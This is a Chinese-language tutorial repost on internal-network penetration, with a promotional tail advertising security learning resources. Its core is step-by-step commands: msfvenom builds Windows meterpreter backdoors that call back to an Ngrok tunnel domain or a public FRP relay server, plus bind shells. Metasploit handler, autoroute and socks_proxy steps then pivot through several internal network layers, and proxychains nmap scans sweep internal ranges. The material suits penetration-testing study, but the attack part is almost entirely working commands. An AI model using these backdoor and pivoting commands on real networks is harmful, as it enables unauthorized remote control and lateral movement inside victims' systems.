大家好,欢迎来到IT知识分享网。
内网安全:Socks 代理 || 本地代理 技术.
Socks
目录:
内网安全:Socks 代理 技术.
两个内网通讯上线( Ngrok )
(1)开通隧道:
(2)下载客户端:
(3)生成一个程序后门:
(4)进行监听:(kali)
两个内网通讯上线( Frp 自建跳板 )
(1)跳板环境搭建:
(2)生成程序后面:
(3)进行监听:(kali)
本地代理:( MSF 跳板多个内网主机系列)
第二层内网代理:
(1)信息收集及配置访问:
(2)开启本地代理:
(3)内网扫描:
(4)浏览器访问:
第三层内网代理:
(1)生成正向程序后门:
(2)进行监听:
(3)信息收集及配置访问:
(4)开启本地代理:
第四层内网渗透:
(1)生成正向程序后门:
(2)进行监听:
代理解决的问题:(1)内网有外网 (2)内网有过滤 (3)内网无外网
两个内网通讯上线( Ngrok )
开通隧道工具:https://www.ngrok.cc/user.html
理解:二个内网主机不能相互连接的,这样就可以通过开通的隧道进行连接.
(开通的隧道就是在外网开通一个域名:当目标访问这个域名,则会将数据返还回来到kali中)
(1)开通隧道:
(2)下载客户端:
解压放到 kali 中:(切换的刚刚下载的文件目录中) (1)./sunny clientid 5 // 执行 ./sunny clientid 隧道的IP
(3)生成一个程序后门:(木马)
msfvenom -p windows/meterpreter/reverse_http lhost=bgxg.free.idcfengye.com lport=80 -f exe -o bgxg.exe
(4)进行监听:(kali)
(1)msfconsole (2)use exploit/multi/handler (3)set payload windows/meterpreter/reverse_http (4)set lhost 192.168.0.106 // 本地的 IP 地址 (5)set lport 4444 // 本地的 端口. (6)exploit
两个内网通讯上线( Frp 自建跳板 )
(1)跳板环境 搭建:
需要有自己的服务器,有来搭建跳板. 【服务器 和 控制端】需要下载的工具:https://github.com/fatedier/frp/releases
服务器修改配置文件 frps.ini: [common] bind_port = 6677 // 这个端口修改为 服务器 开放的就行 启动服务端:【切换在下载的目录并执行】 ./frps -c ./frps.ini 控制端修改配置文件 frpc.ini: [common] server_addr = 云主机 IP 地址 server_port = 6677 // frpc 工作端口,必须和上面 frps 保持一致 [msf] type = tcp local_ip = 127.0.0.1 local_port = 5555 // 转发给本机的 5555 remote_port = 6000 // 服务端用 6000 端口转发给本机 启动客户端:【切换在下载的目录并执行】 ./frpc -c ./frpc.ini
(2)生成程序后面:(木马)
msfvenom -p windows/meterpreter/reverse_tcp lhost=服务器(公网)的IP地址 lport=6000 -f exe -o frp.exe
(3)进行监听:(kali)
(1)msfconsole (2)use exploit/multi/handler (3)set payload windows/meterpreter/reverse_tcp (4)set LHOST 127.0.0.1 (5)set LPORT 5555 // 本机监听的端口【和控制端的一样】 (6)exploit 然后把程序后门(木马)放在目标主机上执行就行.
本地代理:( MSF 跳板多个内网主机系列)
第二层内网代理:
(1)信息收集及配置访问:
(1)run get_local_subnets // 获取网络接口 (2)run autoroute -p // 查看路由地址 (3)run autoroute -s 10.0.20.0/24 // 添加地二层内网的路由网段. 或 (3)run post/multi/manage/autoroute // 自动添加,目前所有路由网段
(2)开启本地代理:
background // 挂起会话 如果是msf6,使用代理模板为: use auxiliary/server/socks_proxy 如果是msf5,使用代理模板为: use auxiliary/server/socks4a (1)set srvport 2222 // 设置本地代理端口为2222 (2)exploit // 运行
(3)内网扫描:
打开 /etc/proxychains4.conf 文件: socks4 192.168.0.106 2222 // 添加 本地的代理和端口
进行扫描: proxychains4 nmap -sT -Pn 10.0.20.0/24 -p 80 -Pn:扫描主机检测其是否受到数据包过滤软件或防火墙的保护. -sT:扫描 TCP 数据包已建立的连接 connect
(4)浏览器访问:
第三层内网代理:
(1)生成正向程序后门:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=54321 -f exe > 54321.exe
(2)进行监听:
要在和上面一样的 msf 会话中执行. (1)use exploit/multi/handler (2)set payload windows/x64/meterpreter/bind_tcp (3)set rhost 10.0.20.99 // 第二层内网的 IP 地址 (4)set lport 54321 // 和程序后面(木马)一样的端口 (5)exploit
(3)信息收集及配置访问:
(1)run get_local_subnets // 获取网络接口 (2)run autoroute -p // 查看路由地址 (3)run post/multi/manage/autoroute // 自动添加,目前所有路由网段.
(4)开启本地代理:
background // 挂起会话 如果是msf6,使用代理模板为: use auxiliary/server/socks_proxy 如果是msf5,使用代理模板为: use auxiliary/server/socks4a
(1)set srvport 6666 // 默认端口6666 (2)exploit // 运行
第四层内网渗透:
(1)生成正向程序后门:
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9876 -f exe > 9876.exe
(2)进行监听:
要在和上面一样的 msf 会话中执行. (1)use exploit/multi/handler (2)set payload windows/x64/meterpreter/bind_tcp (3)set rhost 10.0.10.110 // 第二层内网的 IP 地址 (4)set lport 9876 // 和程序后面(木马)一样的端口 (5)exploit
学习链接:第70天:内网安全- 域横向内网漫游Socks代理隧道技术_哔哩哔哩_bilibili
学习网络安全技术的方法无非三种:
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。
第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
第三种就是去找培训。
接下来,我会教你零基础入门快速入门上手网络安全。
网络安全入门到底是先学编程还是先学计算机基础?这是一个争议比较大的问题,有的人会建议先学编程,而有的人会建议先学计算机基础,其实这都是要学的。而且这些对学习网络安全来说非常重要。但是对于完全零基础的人来说又或者急于转行的人来说,学习编程或者计算机基础对他们来说都有一定的难度,并且花费时间太长。
第一阶段:基础准备 4周~6周
第二阶段:web渗透
学习基础 时间:1周 ~ 2周:
配置渗透环境 时间:3周 ~ 4周:
渗透实战操作 时间:约6周:
第三阶段:进阶
如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://haidsoft.com/122481.html